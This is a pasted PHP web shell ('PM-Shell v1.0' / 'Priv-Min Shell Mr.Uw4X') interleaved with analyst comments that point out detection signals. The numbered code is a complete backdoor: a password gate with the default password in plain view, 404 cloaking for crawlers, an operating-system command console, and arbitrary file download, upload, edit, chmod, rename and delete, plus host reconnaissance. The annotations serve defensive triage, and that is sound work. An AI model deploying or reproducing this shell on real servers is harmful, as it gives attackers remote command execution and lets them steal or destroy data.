yonata21

PM-Shell_v1.php

Jan 10th, 2018
  1. <?php
  // [analyst note] Triage annotations for defenders; the numbered code lines are unchanged.
  // The session only carries the "password accepted" flag that the login gate further down sets.
  2. session_start();
  // error_reporting(0) hides PHP errors and warnings; set_time_limit(0) removes the execution
  // time limit for the request.
  3. error_reporting(0);
  4. set_time_limit(0);
  5.  
  // 32-hex-character value that the login gate compares with md5($_POST['pass']). It is a static,
  // unsalted hash, so the literal is a stable string to hunt for in webroots and backups. The
  // trailing comment publishes the matching password, so any party who finds a deployed copy
  // carrying this value can log in, not only whoever planted it.
  6. $auth_pass = "776aaf189d504481af2b3535716f2305"; // default: ./Mruw4x21
  // The next four settings are not read anywhere in the visible code; presumably leftovers from
  // a template - confirm before keying a signature on them alone.
  7. $color = "#00ff00";
  8. $default_action = 'FilesMan';
  9. $default_use_ajax = true;
  10. $default_charset = 'UTF-8';
  // Cloaking: a request whose User-Agent matches any listed name (case-insensitive) gets a
  // 404 status and the script exits before anything else runs. Consequence for responders:
  // an HTTP probe sent with a crawler-style or PycURL User-Agent reports "not found" even
  // though the file is present, so rely on file-system and content scanning to confirm.
  11. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  12.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  13.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  14.         header('HTTP/1.0 404 Not Found');
  15.         exit;
  16.     }
  17. }
  18.  
  // [analyst note] login_shell(): prints a bare HTML page with one password field that POSTs
  // `pass` back to the same URL, then exits. The page title, the "PM-Shell v1.0" banner text
  // and the remote favicon/image/font URLs are fixed strings, usable as content signatures for
  // the file on disk or for captured response bodies. The remote assets are referenced from the
  // HTML, so they are fetched by whoever views the page, not by the compromised server.
  19. function login_shell() {
  20. ?>
  21. <html>
  22. <head>
  23. <link href='http://i48.servimg.com/u/f48/16/08/07/74/indone10.gif' rel='SHORTCUT ICON'/>
  24. <title>MShell Mr.Uw4X</title>
  25. <style type="text/css">
  26. html {
  27.     margin: 20px auto;
  28.     background: #000000;
  29.     color: blue;
  30.     text-align: center;
  31. }
  32. header {
  33.     color: blue;
  34.     margin: 10px auto;
  35. }
  36. input[type=password] {
  37.     width: 250px;
  38.     height: 25px;
  39.     color: white;
  40.     background: #000000;
  41.     border: 1px solid blue;
  42.     padding: 5px;
  43.     margin-left: 20px;
  44.     text-align: center;
  45. }
  46. </style>
  47. </head>
  48. <center>
  49. <header>
  50.     <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet' type='text/css'>
  51.     <font style="color:#000;text-shadow:0px 5px 8px #191970;font-size:90px" face="Ubuntu">PM-Shell v1.0</font><br>
  52.     <img src="https://s26.postimg.org/yv1hggwhl/Shade.png" width=24% height=60%>
  53. <form method="post">
  54. <input type="password" name="pass">
  55. </form>
  56. <?php
  // exit ends the request here, so no code after the call site runs for a client that has
  // not passed the password check.
  57. exit;
  58. }
  // [analyst note] Login gate. The session flag is keyed by md5() of the request's Host header.
  // When the flag is absent: if $auth_pass is empty, or md5($_POST['pass']) equals $auth_pass
  // (loose == comparison), the flag is set and execution continues; otherwise login_shell()
  // prints the form and exits. The `else` belongs to the inner `if`. The password arrives in a
  // POST body, which ordinary access logs do not record; the visible trace is a POST to this
  // script followed by requests that carry the session cookie.
  59. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  60.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  61.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  62.     else
  63.         login_shell();
  // [analyst note] File download. A GET request with file=<path> and act=download sends that
  // file as an attachment and exits. The path is used exactly as supplied: basename() is applied
  // only to the suggested download name, not to the path given to filesize()/readfile(), so any
  // file readable by the PHP process can be retrieved. Both parameters travel in the query
  // string, so web access logs should show which paths were requested - useful when scoping
  // what data left the host.
  64. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  65.     @ob_clean();
  66.     $file = $_GET['file'];
  67.     header('Content-Description: File Transfer');
  68.     header('Content-Type: application/octet-stream');
  69.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  70.     header('Expires: 0');
  71.     header('Cache-Control: must-revalidate');
  72.     header('Pragma: public');
  73.     header('Content-Length: ' . filesize($file));
  74.     readfile($file);
  75.     exit;
  76. }
  77. //password until here
  78. ?>
  79. <?php
  // [analyst note] Strips the slashes that legacy "magic quotes" added to POST values.
  // get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in PHP 8.0; on a runtime
  // without it this call is a fatal error, so the code after this point would not run there,
  // while the login gate and the download branch above execute before it. Check the host's PHP
  // version when judging which features could have been used.
  80. if(get_magic_quotes_gpc()){
  81. foreach($_POST as $key=>$value){
  82. $_POST[$key] = stripslashes($value);
  83. }
  84. }
  85. echo '<!DOCTYPE HTML>
  86. <html>
  87. <head>
  88. <link href="ttp://i48.servimg.com/u/f48/16/08/07/74/indone10.gif" rel="HORTCUT ICON">
  89. <link href="" rel="stylesheet" type="text/css">
  90. <title>MShell Mr.Uw4X</title>
  91. <style>
  92. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  93. @import url(http://fonts.googleapis.com/css?family=Wallpoet);
  94. body{
  95. font-family: "Ubuntu";
  96. font-size: 13px;
  97. background-color: black;
  98. color:white;
  99. }
  100. #content tr:hover{
  101. background-color: #000;
  102. color: #191970;
  103. text-shadow:4px 4px 10px #0000ff;
  104. }
  105. #content .first{
  106. background-color: #191970;
  107. }
  108. table{
  109. border: 0px #000000 solid;
  110. }
  111. a{
  112. color:white;
  113. text-decoration: none;
  114. }
  115. a:hover{
  116. color:blue;
  117. text-shadow:0px 0px 10px #000070;
  118. }
  119. input{
  120. background: #000;
  121. color: #fff;
  122. -moz-border-radius: 5px;
  123. border-radius:5px;}
  124.  
  125. select,textarea{
  126. border: 1px #191970 solid;
  127. background: #000000;
  128. color: #fff;
  129. -moz-border-radius: 5px;
  130. -webkit-border-radius:5px;
  131. border-radius:5px;
  132. }
  133. </style>
  134. </head>
  135. <body>
  136. <link href="http://fonts.googleapis.com/css?family=Wallpoet" rel="stylesheet" type="text/css">
  137. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">';
  138. echo '<tr>';
  139. //Starting About victim
  // [analyst note] Host reconnaissance banner, built on every authenticated page view:
  // OS/kernel string, resolved server IP, effective user and group, disk usage, and whether
  // MySQL, cURL, wget, perl and python are available. All values are echoed without HTML escaping.
  140. $kernel = php_uname();
  141. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  142. /*fuction hdd*/
  // Without the posix extension the script falls back to get_current_user()/getmyuid()/getmygid()
  // and shows "?" for the group name.
  143. if(!function_exists('posix_getegid')) {
  144.     $user = @get_current_user();
  145.     $uid = @getmyuid();
  146.     $gid = @getmygid();
  147.     $group = "?";
  148. } else {
  149.     $uid = @posix_getpwuid(posix_geteuid());
  150.     $gid = @posix_getgrgid(posix_getegid());
  151.     $user = $uid['name'];
  152.     $uid = $uid['uid'];
  153.     $group = $gid['name'];
  154.     $gid = $gid['gid'];
  155. }
  156. $freespace = hdd(disk_free_space("/"));
  157. /*Code hdd*/
  158. $total = hdd(disk_total_space("/"));
  159. $used = $total - $freespace;
  160. $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  161. $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  // The three exe() probes below each start a child process (`wget --help`, `perl --help`,
  // `python --help`) from the PHP worker on every page view. Process-creation telemetry showing
  // the web server or PHP process spawning these commands is a high-signal detection for this
  // file, independent of its name or location.
  162. $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  163. $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  164. $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  165. /*code wget python perl*/
  // Reads the safe_mode and disable_functions ini settings and displays them to the operator.
  166. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=blue>OFF</font>";
  167. $ds = @ini_get("disable_functions");
  168. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
  // Repeats the user/group lookup performed above, with the same result.
  169. if(!function_exists('posix_getegid')) {
  170.     $user = @get_current_user();
  171.     $uid = @getmyuid();
  172.     $gid = @getmygid();
  173.     $group = "?";
  174. } else {
  175.     $uid = @posix_getpwuid(posix_geteuid());
  176.     $gid = @posix_getgrgid(posix_getegid());
  177.     $user = $uid['name'];
  178.     $uid = $uid['uid'];
  179.     $group = $gid['name'];
  180.     $gid = $gid['gid'];
  181. }
  182. //execution: print the banner
  183. echo "Name of Shell: <font style='color:#00f;text-shadow:5px 5px 12px #191970;font-size:15px' face='Wallpoet'>Priv-Min Shell Mr.Uw4X</font><br>";
  184. echo "System: <font color=blue>".$kernel."</font><br>";
  185. echo "Safe Mode: $sm<br>";
  186. echo "Disable Functions: $show_ds<br>";
  187. echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
  188. echo "Group: <font color=blue>".$group."</font> (".$gid.") User: <font color=blue>".$user."</font> (".$uid.") <br>";
  189. echo "HardDisk: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
  190. echo "MySQL: $mysql | Curl: $curl | Perl: $perl | Python: $python | WGET: $wget ";
  191. //ending about victim
  192. //starting home bar
  193. echo "<ul>";
  194. echo "<center>[ <a href='?'>Home</a> ] [ <a href='?dir=$dir&do=cmd'>Console</a> ] [ <a style='color: red;' href='?logout=true'>Logout</a> ]</center>";
  195. echo "</ul>";
  196. //fuction menu bar
  // [analyst note] Command console. With do=cmd in the query string a one-line form is shown;
  // when it is submitted, $_POST['cmd'] is handed unchanged to exe(), which runs it as an
  // operating-system command under the PHP process account, and the output is printed inside
  // <pre> without escaping. In access logs this shows up as POST requests to this script with
  // do=cmd in the query string; the command text is in the POST body, which is not logged unless
  // request-body logging is enabled, so process and command-line auditing on the host is the
  // better source for reconstructing what was run.
  197. if($_GET['do'] == 'cmd') {
  198.     echo "<form method='post'>
  199.     <font style='color: #00f;'>".$user."@".$ip.": ~ $ </font>
  200.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='Enter'>
  201.     </form>";
  202.     if($_POST['do_cmd']) {
  203.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  204.     }
  // Logout: a `logout` query parameter that compares loosely equal to true removes the session
  // flag and redirects the browser to the bare script URL.
  205. } elseif($_GET['logout'] == true) {
  206.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  207.     echo "<script>window.location='?';</script>";
  208. }
  209. //ending home bar
  210. echo '</tr>';
  211. echo '<tr><td><font color="blue">Current Dir :</font> ';
  212.  
  213. //Code Menu
  // [analyst note] Working directory selection. `path` is taken from the query string as-is
  // (default: the script's current directory); backslashes are normalised to forward slashes and
  // the path is split to print a clickable breadcrumb. Nothing restricts the path to the web
  // root, and the components are echoed without HTML escaping.
  214. if(isset($_GET['path'])){
  215. $path = $_GET['path'];
  216. }else{
  217. $path = getcwd();
  218. }
  219. $path = str_replace('\\','/',$path);
  220. $paths = explode('/',$path);
  221.  
  222. foreach($paths as $id=>$pat){
  223. if($pat == '' && $id == 0){
  224. $a = true;
  225. echo '<a href="?path=/">/</a>';
  226. continue;
  227. }
  228. if($pat == '') continue;
  229. echo '<a href="?path=';
  230. for($i=0;$i<=$id;$i++){
  231. echo "$paths[$i]";
  232. if($i != $id) echo "/";
  233. }
  234. echo '">'.$pat.'</a>/';
  235. }
  236. echo '</td></tr><tr><td><center>';
  // File upload. An uploaded file is copied from PHP's temporary upload location to
  // $path/<client-supplied file name>; there is no check on name, extension or content, and
  // copy() is used rather than move_uploaded_file(). On a compromised host, look for files
  // owned by the web server account that appeared in writable directories at the time of
  // multipart POST requests to this script.
  237. if(isset($_FILES['file'])){
  238. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  239. echo '<center><font color="blue">Upload Success</font><br /></center>';
  240. }else{
  241. echo '<center><font color="red">Upload Failed</font><br/></center>';
  242. }
  243. }
  244. echo '<form enctype="multipart/form-data" method="POST">
  245. <font color="white">File Upload :</font> <input type="file" name="file" />
  246. <input type="submit" value="upload" />
  247. </form>
  248. </center></td></tr>';
  // [analyst note] File manager. One if/elseif/else chain selects between three views:
  //   1. `filesrc` in the query string: show a file's contents;
  //   2. `option` in the query string with POST opt other than "delete": chmod, rename or edit;
  //   3. otherwise: optional delete, then the directory listing for $path.
  // Every path comes from request parameters and is used unchanged, so the reachable scope is
  // whatever the PHP process account can read or write. The target paths of chmod, rename,
  // edit and delete are in POST bodies; only `filesrc`, `path` and `option` appear in the
  // query string of access-log entries.
  249. if(isset($_GET['filesrc'])){
  250. echo "<tr><td>Current File : ";
  // The requested path is echoed without escaping; the file contents are HTML-escaped.
  251. echo $_GET['filesrc'];
  252. echo '</tr></td></table><br />';
  253. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  254. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  255. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  // chmod: applies POST `perm` to POST `path`, then re-renders the form with the current mode.
  256. if($_POST['opt'] == 'chmod'){
  257. if(isset($_POST['perm'])){
  258. if(chmod($_POST['path'],$_POST['perm'])){
  259. echo '<font color="blue">Set Permission Success</font><br/>';
  260. }else{
  261. echo '<font color="red">Set Permission Failed</font><br />';
  262. }
  263. }
  264. echo '<form method="POST">
  265. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  266. <input type="hidden" name="path" value="'.$_POST['path'].'">
  267. <input type="hidden" name="opt" value="chmod">
  268. <input type="submit" value="Go" />
  269. </form>';
  // rename: moves POST `path` to $path/<newname>.
  270. }elseif($_POST['opt'] == 'rename'){
  271. if(isset($_POST['newname'])){
  272. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  273. echo '<font color="blue">Ganti Nama Success</font><br/>';
  274. }else{
  275. echo '<font color="red">Ganti Nama Failed</font><br />';
  276. }
  277. $_POST['name'] = $_POST['newname'];
  278. }
  279. echo '<form method="POST">
  280. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  281. <input type="hidden" name="path" value="'.$_POST['path'].'">
  282. <input type="hidden" name="opt" value="rename">
  283. <input type="submit" value="Go" />
  284. </form>';
  // edit: opens POST `path` in 'w' mode (truncating it) and writes POST `src`, i.e. any file
  // writable by the PHP account can be replaced. After an incident, compare web-root and
  // configuration files against a known-good copy rather than trusting modification times alone.
  285. } elseif($_POST['opt'] == 'edit'){
  286. if(isset($_POST['src'])){
  287. $fp = fopen($_POST['path'],'w');
  288. if(fwrite($fp,$_POST['src'])){
  289. echo '<font color="blue">Success Edit File</font><br/>';
  290. }else{
  291. echo '<font color="red">Failed Edit File</font><br/>';
  292. }
  293. fclose($fp);
  294. }
  295. echo '<form method="POST">
  296. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  297. <input type="hidden" name="path" value="'.$_POST['path'].'">
  298. <input type="hidden" name="opt" value="edit">
  299. <input type="submit" value="Save" />
  300. </form>';
  301. }
  302. echo '</center>';
  303. }else{
  304. echo '</table><br/><center>';
  // delete: rmdir() for POST type "dir", unlink() for POST type "file", both on POST `path`.
  305. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  306. if($_POST['type'] == 'dir'){
  307. if(rmdir($_POST['path'])){
  308. echo '<font color="blue">Directory Terhapus</font><br/>';
  309. }else{
  310. echo '<font color="red">Directory Failed Terhapus                                                                                                                                                                                                                                                                                             </font><br/>';
  311. }
  312. }elseif($_POST['type'] == 'file'){
  313. if(unlink($_POST['path'])){
  314. echo '<font color="blue">File Terhapus</font><br/>';
  315. }else{
  316. echo '<font color="red">File Failed Dihapus</font><br/>';
  317. }
  318. }
  319. }
  320. echo '</center>';
  // Listing: scandir($path) is walked twice, first printing sub-directories, then regular
  // files. Each row carries a small form that POSTs the chosen action to ?option&path=<path>.
  321. $scandir = scandir($path);
  322. echo '<div id="content"><table width="1250" border="0" cellpadding="3" cellspacing="1" align="center">
  323. <tr class="first">
  324. <td><center>Name</peller></center></td>
  325. <td><center>Type</peller></center></td>
  326. <td><center>Last Modify</peller></center></td>
  327. <td><center>Owner/Group</peller></center></td>
  328. <td><center>Size</peller></center></td>
  329. <td><center>Permission</peller></center></td>
  330. <td><center>Action</peller></center></td>
  331. </tr>';
  332. //For Code Column Directory
  333. foreach($scandir as $dir){
  334. $dtype = filetype("$dir/$dirx");
  335. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  336. if(function_exists('posix_getpwuid')) {
  337.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  338.                     $downer = $downer['name'];
  339.                 } else {
  340.                     //$downer = $uid;
  341.                     $downer = fileowner("$dir/$dirx");
  342.                 }
  343.                 if(function_exists('posix_getgrgid')) {
  344.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  345.                     $dgrp = $dgrp['name'];
  346.                 } else {
  347.                     $dgrp = filegroup("$dir/$dirx");
  348.                 }
  349. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  350. echo '<tr>
  351. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>';
  352. echo "<td><center>$dtype</center></td>";
  353. echo "<td><center>$dtime</center></td>";
  354. echo "<td><center>$downer/$dgrp</center></td>";
  355. echo "<td><center>--</center></td>
  356. <td><center>";
  357. if(is_writable($path.'/'.$dir)) echo '<font color="blue">';
  358. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  359. echo perms($path.'/'.$dir);
  360. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  361.  
  362. echo '</center></td>
  363. <td><center><form method="POST" action="?option&path='.$path.'">
  364. <select name="opt">
  365. <option value="delete">Delete</option>
  366. <option value="chmod">Chmod</option>
  367. <option value="rename">Rename</option>
  368. </select>
  369. <input type="hidden" name="type" value="dir">
  370. <input type="hidden" name="name" value="'.$dir.'">
  371. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  372. <input type="submit" value="GO">
  373. </form></center></td>
  374. </tr>';
  375. }
  376. //Code For File Column
  377. foreach($scandir as $file){
  378. $ftype = filetype("$path/$file");
  379. $ftime = date("F d Y g:i:s", filemtime("$path/$file"));
  380. if(function_exists('posix_getpwuid')) {
  381.                 $fowner = @posix_getpwuid(fileowner("$path/$file"));
  382.                 $fowner = $fowner['name'];
  383.             } else {
  384.                 //$downer = $uid;
  385.                 $fowner = fileowner("$path/$file");
  386.             }
  387.             if(function_exists('posix_getgrgid')) {
  388.                 $fgrp = @posix_getgrgid(filegroup("$path/$file"));
  389.                 $fgrp = $fgrp['name'];
  390.             } else {
  391.                 $fgrp = filegroup("$path/$file");
  392.             }
  393. if(!is_file($path.'/'.$file)) continue;
  394. $size = filesize($path.'/'.$file)/1024;
  395. $size = round($size,3);
  396. if($size >= 1024){
  397. $size = round($size/1024,2).' MB';
  398. }else{
  399. $size = $size.' KB';
  400. }
  401.  
  402. echo '<tr>
  403. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>';
  404. echo "<td><center>$ftype</center></td>";
  405. echo "<td><center>$ftime</center></td>";
  406. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  407. echo "<td><center>$size</center></td>
  408. <td><center>";
  409. if(is_writable($path.'/'.$file)) echo '<font color="blue">';
  410. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  411. echo perms($path.'/'.$file);
  412. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  413. echo '</center></td>
  414. <td><center><form method="POST" action="?option&path='.$path.'">
  415. <select name="opt">
  416. <option value="delete">Delete</option>
  417. <option value="chmod">Chmod</option>
  418. <option value="rename">Rename</option>
  419. <option value="edit">Edit</option>
  420. </select>
  421. <input type="hidden" name="type" value="file">
  422. <input type="hidden" name="name" value="'.$file.'">
  423. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  424. <input type="submit" value="GO">
  425. </form></center></td>
  426. </tr>';
  427. }
  428. echo '</table>
  429. </div>';
  430. }
  431. echo "<center><hr width=280 color=#191970>Copyright &copy; ".date("Y")." - <a href='https://s1.postimg.org/3i7tcvdrbj/Shade.png'><font color=blue>Mr.Uw4X</font></a></center>
  432. </body>
  433. </html>";
  434. //Function Code HDD + exe
  /**
   * Render a byte count as a short human-readable string.
   *
   * Values of at least 1024 are divided by the largest fitting binary unit and
   * printed with two decimals ("1.50 KB", "2.00 GB"); smaller values are
   * returned as "<value> B".
   *
   * @param int|float $s Size in bytes.
   * @return string Formatted size with unit suffix.
   */
  function hdd($s) {
      // Largest unit first so the first threshold reached decides the suffix.
      $thresholds = array(
          'GB' => 1073741824,
          'MB' => 1048576,
          'KB' => 1024,
      );
      foreach ($thresholds as $suffix => $divisor) {
          if ($s >= $divisor) {
              return sprintf('%1.2f', $s / $divisor) . ' ' . $suffix;
          }
      }
      return $s . ' B';
  }
  // [analyst note] exe($cmd): runs $cmd as an operating-system command through the first of
  // system(), exec(), passthru(), shell_exec() for which function_exists() is true, and returns
  // the captured output as a string. If none of the four exists, control falls off the end of
  // the function and no value is returned. $cmd is used exactly as passed; in this file the
  // callers pass three fixed "--help" probes and the operator-supplied $_POST['cmd']. The @
  // prefix suppresses warnings from each call.
  // Defensive relevance: every branch starts a process from the PHP worker. Restricting these
  // four functions through the disable_functions ini setting (the same setting this script
  // displays in its banner) and alerting on child processes of the web server or PHP process
  // both address this function directly.
  445. function exe($cmd) {
  446.     if(function_exists('system')) {        
  // system() prints as it runs, so output buffering is used to capture the text instead.
  447.         @ob_start();       
  448.         @system($cmd);     
  449.         $buff = @ob_get_contents();        
  450.         @ob_end_clean();       
  451.         return $buff;  
  452.     } elseif(function_exists('exec')) {        
  // exec() returns the output as an array of lines; they are joined with no separator.
  453.         @exec($cmd,$results);      
  454.         $buff = "";        
  455.         foreach($results as $result) {         
  456.             $buff .= $result;      
  457.         } return $buff;    
  458.     } elseif(function_exists('passthru')) {        
  459.         @ob_start();       
  460.         @passthru($cmd);       
  461.         $buff = @ob_get_contents();        
  462.         @ob_end_clean();       
  463.         return $buff;  
  464.     } elseif(function_exists('shell_exec')) {      
  465.         $buff = @shell_exec($cmd);     
  466.         return $buff;  
  467.     }
  468. }
  /**
   * Build an `ls -l` style permission string (for example "-rw-r--r--") for a path.
   *
   * The first character is the file type taken from the high bits of the mode
   * returned by fileperms(); the next nine are the owner, group and world
   * read/write/execute flags, with setuid, setgid and sticky shown in the
   * execute position of their triad.
   *
   * @param string $file Path to inspect.
   * @return string Ten-character type and permission string.
   */
  function perms($file){
      $mode = fileperms($file);

      // Type masks are tested in this order and the first full match wins;
      // 'u' (unknown) is kept when none matches.
      $typeLetters = array(
          0xC000 => 's', // socket
          0xA000 => 'l', // symbolic link
          0x8000 => '-', // regular file
          0x6000 => 'b', // block special
          0x4000 => 'd', // directory
          0x2000 => 'c', // character special
          0x1000 => 'p', // FIFO pipe
      );
      $text = 'u';
      foreach ($typeLetters as $mask => $letter) {
          if (($mode & $mask) == $mask) {
              $text = $letter;
              break;
          }
      }

      // One row per triad: read bit, write bit, execute bit, special bit,
      // letter when special and executable, letter when special only.
      $triads = array(
          array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner / setuid
          array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group / setgid
          array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world / sticky
      );
      foreach ($triads as $row) {
          list($readBit, $writeBit, $execBit, $specialBit, $specialExec, $specialOnly) = $row;
          $text .= ($mode & $readBit) ? 'r' : '-';
          $text .= ($mode & $writeBit) ? 'w' : '-';
          if ($mode & $execBit) {
              $text .= ($mode & $specialBit) ? $specialExec : 'x';
          } else {
              $text .= ($mode & $specialBit) ? $specialOnly : '-';
          }
      }

      return $text;
  }
  521. ?>